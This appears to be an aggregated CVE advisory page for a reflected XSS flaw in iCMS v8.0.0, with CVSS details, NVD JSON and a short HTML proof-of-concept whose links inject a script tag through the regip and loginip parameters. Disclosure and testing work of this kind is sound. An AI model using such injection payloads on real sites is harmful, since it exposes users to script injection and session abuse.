Security Vulnerability Report
CVE-2026-30661 CVSS 6.1 MEDIUM

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-25 20:53:28

Description

iCMS v8.0.0 contains a Cross-Site Scripting (XSS) vulnerability in the User Management component, specifically within the index.html file. This allows remote attackers to execute arbitrary web script or HTML via the regip or loginip parameters.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:idreamsoft:icms:8.0.0:*:*:*:*:*:*:* - VULNERABLE
iCMS 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-30661
     Description: Inject script into regip or loginip parameters -->
<html>
<body>
  <h3>iCMS v8.0.0 XSS PoC</h3>
  <p>Click the link below to trigger the vulnerability via the 'regip' parameter:</p>
  <a href="http://target-domain/index.html?regip="><script>alert('XSS_CVE-2026-30661')</script>">Exploit Link (regip)</a>
  <br/>
  <p>Alternatively, trigger via 'loginip' parameter:</p>
  <a href="http://target-domain/index.html?loginip="><script>alert('XSS_CVE-2026-30661')</script>">Exploit Link (loginip)</a>
</body>
</html>

References

https://wang1rrr.github.io/2026/02/09/CVE-Report-iCMS-v8.0.0-XSS/ (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30661", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:34.350", "lastModified": "2026-03-25T20:53:28.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iCMS v8.0.0 contains a Cross-Site Scripting (XSS) vulnerability in the User Management component, specifically within the index.html file. This allows remote attackers to execute arbitrary web script or HTML via the regip or loginip parameters."}, {"lang": "es", "value": "iCMS v8.0.0 contiene una vulnerabilidad de cross-site scripting (XSS) en el componente de Gestión de Usuarios, específicamente dentro del archivo index.html. Esto permite a atacantes remotos ejecutar scripts web o HTML arbitrarios a través de los parámetros regip o loginip."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:idreamsoft:icms:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B7299423-99C7-42AB-9AEE-21329873F4C2"}]}]}], "references": [{"url": "https://wang1rrr.github.io/2026/02/09/CVE-Report-iCMS-v8.0.0-XSS/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}